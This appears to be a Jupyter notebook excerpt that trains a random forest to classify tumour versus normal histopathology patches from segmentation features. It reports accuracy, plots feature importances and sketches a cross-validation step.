x = pd.read_table(df1.loc[693, 'segmented_tsv'])
x
x = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_segmented_tumor001/tumor_001_75_63.segmented_summary.tsv')
x
train_samples
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score
from sklearn.datasets import make_blobs
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix

clf = RandomForestClassifier(n_jobs=-1, random_state=0)
features = train_samples.columns
clf.fit(train_samples.loc[:, features[1:]], train_samples.is_tumor)
predictions = clf.predict(validation_samples.loc[:, features[1:]])
print("Train Accuracy :: {} ".format(accuracy_score(train_samples.is_tumor, clf.predict(train_samples.loc[:, features[1:]]))))
print("Test Accuracy :: {} ".format(accuracy_score(validation_samples.is_tumor, predictions)))
importances = clf.feature_importances_
indices = np.argsort(importances)[::-1]
importances
for f in range(train_samples.shape[1]-1):
    print("%d. feature %s (%f)" % (f + 1, train_samples.columns[indices[f]+1], importances[indices[f]]))
std = np.std([tree.feature_importances_ for tree in clf.estimators_], axis=0)
sns.set_context('talk', font_scale=2)
sns.set_style('white')
fig, ax = plt.subplots(figsize=(10, 10))
ax.set_title('Feature importances')
# horizontal bars, so the error bars run along the value (x) axis
ax.barh(list(features[1:][indices])[:15], list(importances[indices])[:15], xerr=list(std[indices])[:15], align="center")
#ax.set_xticks(range(X.shape[1]), indices)
fig.tight_layout()
fig.savefig('presentation_images/rf_feature_importances.pdf')
###Output _____no_output_____
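###Markdown `cross_val_score` is imported above but never used; a cross-validated score would give a less optimistic estimate than the train accuracy. The cell below is a hypothetical sketch of how it could be applied to the same forest (an illustrative addition, assuming `train_samples` fits in memory). ###Code
# Sketch: 5-fold cross-validated ROC AUC for the random forest above.
cv_scores = cross_val_score(clf, train_samples.loc[:, features[1:]],
                            train_samples.is_tumor, cv=5, scoring='roc_auc')
print("CV ROC AUC :: {:.3f} +/- {:.3f}".format(cv_scores.mean(), cv_scores.std()))
###Output _____no_output_____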